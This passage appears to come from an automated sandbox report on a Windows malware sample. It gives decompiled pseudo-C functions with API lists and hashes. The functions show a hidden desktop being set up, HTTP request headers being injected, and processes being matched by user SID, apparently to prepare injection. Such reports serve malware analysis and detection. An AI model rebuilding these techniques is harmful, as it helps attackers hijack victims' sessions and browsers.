				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E0040C841( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E0040F24B(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E0040F5BD(_t109, _t63);
					E0040F57B(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0041285A(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E00413140(0x2937498d,  &_v1028, 0);
						_t63 = E0040A2BA(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E00416770(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E004169DB( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E004128DB(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E00411A47( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E0040C275( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E0040DA89( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x416bea;
								_v1124 = 0x416bed;
								_v1120 = E00416BF0;
								_v1116 = E00416C14;
								_v1112 = E00416C5B;
								_v1108 = E00416C90;
								_v1104 = 0x416bea;
								E0040718A(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
						if(_t71 == 0xffffffff) {
							_t63 = E0041C27A(_v1156, _t109);
						} else {
							_push(_v1152);
							_t63 = E0040F3BE(_v1156);
							_t105 = _a4;
						}
						goto L20;
					}
				} else {
					_t100 = 2;
					_v1148 = _t100;
					_t108 =  *(_t105 + 4) << 8;
					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
					_v1144 = 0x100007f;
					_t63 = E0040F20A( &_v1148);
					_v1152 = _t63;
					if(_t63 == _t119) {
						L20:
						E0040F565(E0040F565(_t63, _v1156), _v1152);
						E0040C1C2(_t105);
						return 0;
					} else {
						E0040F5BD(_t108, _t63);
						goto L4;
					}
				}
			}

0x0041ab58
0x0041ab65
0x0041ab68
0x0041ab6b
0x0041ab6c
0x0041ab70
0x0041ab74
0x0041ab7a
0x0041abc0
0x0041abc7
0x0041abcc
0x0041abd1
0x0041abd6
0x0041abda
0x0041abdc
0x00000000
0x00000000
0x0041abe3
0x0041abec
0x0041abf4
0x0041abf5
0x0041abf7
0x0041abfd
0x0041ac05
0x00000000
0x00000000
0x0041ac0b
0x0041ac11
0x0041ac44
0x0041ac5a
0x0041ac67
0x0041ac6c
0x0041ac6e
0x00000000
0x00000000
0x0041ac7d
0x0041ac82
0x0041ac84
0x0041adb0
0x0041adb9
0x00000000
0x0041ac8a
0x0041ac8a
0x0041ac90
0x0041ac92
0x0041ac97
0x0041ac9c
0x0041acab
0x0041acb0
0x0041acbd
0x0041acc3
0x0041acc5
0x0041acd2
0x0041acd7
0x0041acd9
0x0041acdd
0x0041ace5
0x0041acf1
0x0041ad09
0x0041ad0d
0x0041ad12
0x0041ad14
0x0041ad1f
0x0041ad2f
0x0041ad35
0x0041ad37
0x0041ad37
0x0041ad14
0x0041acd9
0x0041acc5
0x0041ad44
0x0041ad4a
0x0041ad4f
0x0041ad66
0x0041ad73
0x0041ad7b
0x0041ad83
0x0041ad8b
0x0041ad93
0x0041ad9b
0x0041ada3
0x0041adab
0x0041adab
0x00000000
0x0041ad4f
0x0041ac13
0x0041ac16
0x0041ac31
0x0041ac18
0x0041ac18
0x0041ac20
0x0041ac25
0x0041ac25
0x00000000
0x0041ac16
0x0041ab81
0x0041ab87
0x0041ab88
0x0041ab91
0x0041ab9c
0x0041aba1
0x0041aba9
0x0041abae
0x0041abb4
0x0041adbe
0x0041adcb
0x0041add1
0x0041adde
0x0041abba
0x0041abbb
0x00000000
0x0041abbb
0x0041abb4

APIs

Part of subcall function 0040F20A: #23.WS2_32(?,00000001,00000006,?,0040F2E9,?,?,?,0041AE6A,?), ref: 0040F213
Part of subcall function 0040F20A: #4.WS2_32(00000000,?,-0000001D,?,?,?,0041AE6A,?), ref: 0040F233
Part of subcall function 0040F20A: #3.WS2_32(00000000,?,?,?,0041AE6A,?), ref: 0040F23E

Part of subcall function 0040F5BD: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0041427D,00000000), ref: 0040F5D3

GetCurrentThread.KERNEL32 ref: 0041AC3D
SetThreadPriority.KERNEL32(00000000), ref: 0041AC44

Part of subcall function 0040A2BA: OpenWindowStationW.USER32 ref: 0040A2DF
Part of subcall function 0040A2BA: CreateWindowStationW.USER32 ref: 0040A2F2
Part of subcall function 0040A2BA: GetProcessWindowStation.USER32 ref: 0040A303
Part of subcall function 0040A2BA: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040A33E
Part of subcall function 0040A2BA: CreateDesktopW.USER32 ref: 0040A352
Part of subcall function 0040A2BA: GetCurrentThreadId.KERNEL32 ref: 0040A35E
Part of subcall function 0040A2BA: GetThreadDesktop.USER32(00000000), ref: 0040A365
Part of subcall function 0040A2BA: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040A377
Part of subcall function 0040A2BA: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040A389
Part of subcall function 0040A2BA: CloseWindowStation.USER32(?,?), ref: 0040A3A4

Part of subcall function 00416770: TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789

GetShellWindow.USER32 ref: 0041AC8A
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041ACBD

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041AD1F
CloseHandle.KERNEL32(?), ref: 0041AD2F
CloseHandle.KERNEL32(?), ref: 0041AD35
SystemParametersInfoW.USER32 ref: 0041AD44

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWait
String ID:
API String ID: 2295704857-0
Opcode ID: 11b700432be9c607f7731a01a02388cfbe91d3c54ded604f65dcfb8c59d970f2
Instruction ID: 281bb4c474db6f9a72ccc591067f138f9e1ddd02bfd3f89af6a864bb6c6c52c9
Opcode Fuzzy Hash: 11b700432be9c607f7731a01a02388cfbe91d3c54ded604f65dcfb8c59d970f2
Instruction Fuzzy Hash: 5561D471008341ABC720EF65CD44ADFBBE9AF85714F00492EF994A72A1D778D889CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD60, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CD60(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v104;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v125;
				char _v128;
				char _v136;
				intOrPtr _v172;
				char _v173;
				signed int _v176;
				intOrPtr _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t85;
				signed int _t88;
				void* _t92;
				void* _t96;
				void* _t100;
				signed int _t107;
				signed char* _t119;
				signed int _t120;
				struct _CRITICAL_SECTION* _t126;
				char* _t138;
				char* _t139;
				char* _t140;
				signed int _t142;
				signed int _t148;

				_v120 = _v120 | 0xffffffff;
				if(E0041CC45( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
					L23:
					E004159FB( &_v76);
					return _v120;
				}
				_t85 = E004150CD( &_v76);
				_v120 = _t85;
				if((1 & _t85) == 0) {
					__eflags = _t85 & 0x00000002;
					if((_t85 & 0x00000002) == 0) {
						_t126 = 0x42400c;
						L18:
						__eflags = _v116 & 0x00000004;
						if((_v116 & 0x00000004) == 0) {
							goto L23;
						}
						 *_a8 = _v40;
						 *_a12 = _v36;
						EnterCriticalSection(_t126);
						_t146 = _a4;
						_t88 = E0041C2C7(_a4);
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							L21:
							_t148 = _t88 * 0x24;
							__eflags = _t148;
							E0040C1C2( *((intOrPtr*)(_t148 +  *0x423e7c + 8)));
							 *((intOrPtr*)(_t148 +  *0x423e7c + 8)) = _v44;
							L22:
							LeaveCriticalSection(_t126);
							goto L23;
						}
						_t88 = E0041C2ED(_t88, _t146);
						__eflags = _t88 - 0xffffffff;
						if(_t88 == 0xffffffff) {
							goto L22;
						}
						goto L21;
					}
					_v124 = _v124 & 0x00000000;
					_v125 = 1;
					__eflags = _v16 - 1;
					if(_v16 != 1) {
						L9:
						_t138 =  &_v104;
						_t92 = 0x21;
						E004128A5(_t92, _t138);
						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
						_t139 =  &_v128;
						_t96 = 0x22;
						E004128A5(_t96, _t139);
						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
						_t140 =  &_v136;
						_t100 = 0x23;
						E004128A5(_t100, _t140);
						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
						L10:
						_t126 = 0x42400c;
						EnterCriticalSection(0x42400c);
						__eflags = _v173;
						if(_v173 == 0) {
							L14:
							E00415A65(_v64, _v68);
							__eflags = _v176;
							if(_v176 != 0) {
								E0040DE4F(_v172);
							}
							L16:
							LeaveCriticalSection(_t126);
							goto L18;
						}
						_t150 = _a4;
						_t107 = E0041C2C7(_a4);
						__eflags = _t107 - 0xffffffff;
						if(_t107 != 0xffffffff) {
							L13:
							_t142 = _t107 * 0x24;
							E00415A65( *((intOrPtr*)( *0x423e7c + _t142 + 0x10)),  *((intOrPtr*)( *0x423e7c + _t142 + 0xc)));
							E0040C1C2( *(_t142 +  *0x423e7c + 0x14));
							 *(_t142 +  *0x423e7c + 0x14) =  *(_t142 +  *0x423e7c + 0x14) & 0x00000000;
							 *(_t142 +  *0x423e7c + 0x1c) =  *(_t142 +  *0x423e7c + 0x1c) & 0x00000000;
							 *(_t142 +  *0x423e7c + 0x18) =  *(_t142 +  *0x423e7c + 0x18) | 0xffffffff;
							 *((intOrPtr*)(_t142 +  *0x423e7c + 0xc)) = _v76;
							 *((intOrPtr*)(_t142 +  *0x423e7c + 0x10)) = _v72;
							 *((intOrPtr*)(_t142 +  *0x423e7c + 0x20)) = _v180;
							goto L16;
						}
						_t107 = E0041C2ED(_t107, _t150);
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							goto L14;
						}
						goto L13;
					}
					_t119 = _v20;
					__eflags =  *_t119 & 0x00000003;
					if(( *_t119 & 0x00000003) == 0) {
						goto L9;
					}
					_t120 = E00415CC0(_t119,  &_v76);
					_v124 = _t120;
					__eflags = _t120;
					if(_t120 != 0) {
						_v120 = 1;
					} else {
						_v125 = _t120;
					}
					goto L10;
				} else {
					SetLastError(0x2f78);
					_v120 = _v120 & 0x00000000;
					goto L23;
				}
			}

0x0041cd6c
0x0041cd89
0x0041cf71
0x0041cf75
0x0041cf84
0x0041cf84
0x0041cd92
0x0041cd9a
0x0041cda0
0x0041cdb7
0x0041cdb9
0x0041cf0c
0x0041cf11
0x0041cf11
0x0041cf16
0x00000000
0x00000000
0x0041cf1f
0x0041cf29
0x0041cf2b
0x0041cf31
0x0041cf34
0x0041cf39
0x0041cf3c
0x0041cf49
0x0041cf50
0x0041cf50
0x0041cf57
0x0041cf66
0x0041cf6a
0x0041cf6b
0x00000000
0x0041cf6b
0x0041cf3f
0x0041cf44
0x0041cf47
0x00000000
0x00000000
0x00000000
0x0041cf47
0x0041cdbf
0x0041cdc4
0x0041cdc8
0x0041cdcc
0x0041cdf4
0x0041cdf6
0x0041cdfa
0x0041cdfb
0x0041ce13
0x0041ce17
0x0041ce1b
0x0041ce1c
0x0041ce2f
0x0041ce33
0x0041ce37
0x0041ce38
0x0041ce46
0x0041ce48
0x0041ce48
0x0041ce4e
0x0041ce54
0x0041ce59
0x0041cee3
0x0041ceee
0x0041cef3
0x0041cef8
0x0041cefe
0x0041cefe
0x0041cf03
0x0041cf04
0x00000000
0x0041cf04
0x0041ce5f
0x0041ce62
0x0041ce67
0x0041ce6a
0x0041ce77
0x0041ce7e
0x0041ce89
0x0041ce97
0x0041cea1
0x0041ceab
0x0041ceb5
0x0041cec3
0x0041ced0
0x0041cedd
0x00000000
0x0041cedd
0x0041ce6d
0x0041ce72
0x0041ce75
0x00000000
0x00000000
0x00000000
0x0041ce75
0x0041cdce
0x0041cdd2
0x0041cdd5
0x00000000
0x00000000
0x0041cddb
0x0041cde0
0x0041cde4
0x0041cde6
0x0041cdee
0x0041cde8
0x0041cde8
0x0041cde8
0x00000000
0x0041cda2
0x0041cda7
0x0041cdad
0x00000000
0x0041cdad

APIs

Part of subcall function 004150CD: EnterCriticalSection.KERNEL32(00423E54,-004223DC,00000000,004223C0), ref: 004150E8
Part of subcall function 004150CD: LeaveCriticalSection.KERNEL32(00423E54), ref: 0041516B

SetLastError.KERNEL32(00002F78,?), ref: 0041CDA7
EnterCriticalSection.KERNEL32(0042400C), ref: 0041CE4E
LeaveCriticalSection.KERNEL32(0042400C,?), ref: 0041CF04
EnterCriticalSection.KERNEL32(0042400C,?), ref: 0041CF2B
LeaveCriticalSection.KERNEL32(0042400C,?), ref: 0041CF6B

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$ErrorLast
String ID:
API String ID: 486337731-0
Opcode ID: a19101e10b8d8420592560b0faa8470eb111ef9944dccf7271f6313af0e25967
Instruction ID: e7d0cbe002f95a39e289d6771a18fb2ac5a97b51dd5bb2f30ed778911b11de95
Opcode Fuzzy Hash: a19101e10b8d8420592560b0faa8470eb111ef9944dccf7271f6313af0e25967
Instruction Fuzzy Hash: F551A231644301DBD721DF28DC84A9A7BA5FF89368F10466EF8A4972F1C738D985CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0041D76E, Relevance: 12.1, APIs: 8, Instructions: 116
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D76E() {
				long _v564;
				char _v568;
				void* _v572;
				char _v576;
				void* _v580;
				void* _v584;
				void* _v588;
				char _v589;
				signed int _v592;
				signed int _v596;
				char _v597;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t67;
				int _t74;
				void** _t76;
				void* _t79;

				_t74 = 0;
				_v589 = 0;
				_v584 = 0;
				_v588 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t74);
					_v584 = _t42;
					_v580 = _t74;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v568;
						_v568 = 0x22c;
						Process32FirstW(_v584, _t45);
					}
					while(_t45 != 0) {
						_t67 = _v564;
						if(_t67 <= _t74 || _t67 ==  *0x423b10) {
							L20:
							_t45 = Process32NextW(_v588,  &_v572);
							continue;
						} else {
							_t47 = 0;
							if(_v596 <= _t74) {
								L8:
								_t48 = E004130C4(_t67, _t72, _t67);
								_v584 = _t48;
								if(_t48 != _t74) {
									_t79 = OpenProcess(0x400, _t74, _v564);
									if(_t79 != _t74) {
										_t76 = E0040D7D9(_t67, _t79,  &_v576);
										CloseHandle(_t79);
										if(_t76 != 0) {
											if(_v576 ==  *0x4238b0 && GetLengthSid( *_t76) ==  *0x4238a8 && E0040C233( *((intOrPtr*)( *0x4238a4)),  *_t76, _t56) == 0 && E0040C14D(4 + _v596 * 4,  &_v592) != 0) {
												_t72 = _v596;
												_v596 = _v596 + 1;
												_v584 = _v584 + 1;
												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
												if(E0041D6E5(_v592, _v564, _v580) != 0) {
													_v597 = 1;
												}
											}
											E0040C1C2(_t76);
										}
										_t74 = 0;
									}
									CloseHandle(_v580);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
								L6:
								_t72 = _v592;
								if( *((intOrPtr*)(_v592 + _t47 * 4)) == _t67) {
									goto L20;
								}
								_t47 = _t47 + 1;
								if(_t47 < _v596) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v588);
					if(_v584 != _t74) {
						continue;
					}
					break;
				}
				E0040C1C2(_v588);
				return _v597;
			}

0x0041d783
0x0041d785
0x0041d78a
0x0041d78e
0x0041d792
0x0041d795
0x0041d79b
0x0041d79f
0x0041d7a6
0x00000000
0x0041d7ac
0x0041d7ac
0x0041d7b5
0x0041d7bd
0x0041d7bd
0x0041d8cd
0x0041d7c8
0x0041d7ce
0x0041d8be
0x0041d8c7
0x00000000
0x0041d7e0
0x0041d7e0
0x0041d7e6
0x0041d7fc
0x0041d7fd
0x0041d802
0x0041d808
0x0041d81e
0x0041d822
0x0041d834
0x0041d836
0x0041d83a
0x0041d846
0x0041d883
0x0041d893
0x0041d897
0x0041d89b
0x0041d8a9
0x0041d8ab
0x0041d8ab
0x0041d8a9
0x0041d8b1
0x0041d8b1
0x0041d8b6
0x0041d8b6
0x0041d8bc
0x0041d8bc
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d7e8
0x0041d7e8
0x0041d7e8
0x0041d7ef
0x00000000
0x00000000
0x0041d7f5
0x0041d7fa
0x00000000
0x00000000
0x00000000
0x0041d7fa
0x00000000
0x0041d7e8
0x0041d7ce
0x0041d8d9
0x0041d8df
0x00000000
0x00000000
0x00000000
0x0041d8df
0x0041d8e9
0x0041d8f8

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041D795
Process32FirstW.KERNEL32 ref: 0041D7BD
OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041D818
CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041D836
GetLengthSid.ADVAPI32(00000000), ref: 0041D84A
CloseHandle.KERNEL32(?), ref: 0041D8BC
Process32NextW.KERNEL32(?,?), ref: 0041D8C7
CloseHandle.KERNEL32(?), ref: 0041D8D9

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: 99b007e72a165d7aa50115ec1b6f90d50d3469f78bf00d9df824fd86016c85f7
Instruction ID: eabaa252c2f828ba57b1d57d06c82621023f6707fecf00368cb31ba16e78e5df
Opcode Fuzzy Hash: 99b007e72a165d7aa50115ec1b6f90d50d3469f78bf00d9df824fd86016c85f7
Instruction Fuzzy Hash: D1418A70908341DFD711EF24C9849ABBBE5FF89304F100A2EF5A4A72A1D739D985CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF8, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407DF8(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x00407e01
0x00407e08
0x00407e0a
0x00407e0c
0x00407e12
0x00407e25
0x00407e28
0x00407e2b
0x00407e38
0x00407e40
0x00407e4b
0x00407e6a
0x00407e6e
0x00407e71
0x00407e8f
0x00407e8f
0x00407e92
0x00407eb2
0x00000000
0x00407e94
0x00407e94
0x00407e94
0x00407e95
0x00407ead
0x00407e97
0x00407e97
0x00407e97
0x00407e98
0x00407ea5
0x00000000
0x00407e9a
0x00407e9a
0x00407e9b
0x00000000
0x00000000
0x00407e9b
0x00407e98
0x00407e95
0x00407e73
0x00407e73
0x00407e8a
0x00407e8a
0x00000000
0x00407e75
0x00407e76
0x00407e76
0x00407e77
0x00000000
0x00407e79
0x00407e7a
0x00407e7a
0x00407e7b
0x00407e9d
0x00407e9d
0x00000000
0x00407e7d
0x00407e7d
0x00407e7d
0x00407e80
0x00407ea8
0x00407ea8
0x00407e82
0x00407e82
0x00407e82
0x00407e83
0x00407ea0
0x00407ea0
0x00407e85
0x00407e85
0x00407e86
0x00407eb5
0x00407eb5
0x00407eb5
0x00407e86
0x00407e83
0x00407e80
0x00407e7b
0x00407e77
0x00407e73
0x00407e4d
0x00407e4d
0x00407e50
0x00407e56
0x00407e5c
0x00407e5f
0x00407e62
0x00407e65
0x00407e65
0x00407ebc
0x00407ec4
0x00407ed6
0x00407eea
0x00407eea
0x00000000
0x00407f0e
0x00407ec4
0x00407f18

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
ReleaseMutex.KERNEL32(?), ref: 00407E2B
GetWindowRect.USER32 ref: 00407E38
IsRectEmpty.USER32(?), ref: 00407EBC
GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
GetParent.USER32(?), ref: 00407EE1
MapWindowPoints.USER32 ref: 00407EEA
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
Instruction ID: a322bd2c658f0833cb6b0f0a38ff9ffaa20a9a7f680455052717c4b83f970561
Opcode Fuzzy Hash: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
Instruction Fuzzy Hash: F7412371D0520AAFCB108FA8C9855FFBBB4FB04350F5045BAE511B22A0D778AD41DBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF8, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407DF8(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
ReleaseMutex.KERNEL32(?), ref: 00407E2B
GetWindowRect.USER32 ref: 00407E38
IsRectEmpty.USER32(?), ref: 00407EBC
GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
GetParent.USER32(?), ref: 00407EE1
MapWindowPoints.USER32 ref: 00407EEA
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E

Memory Dump Source

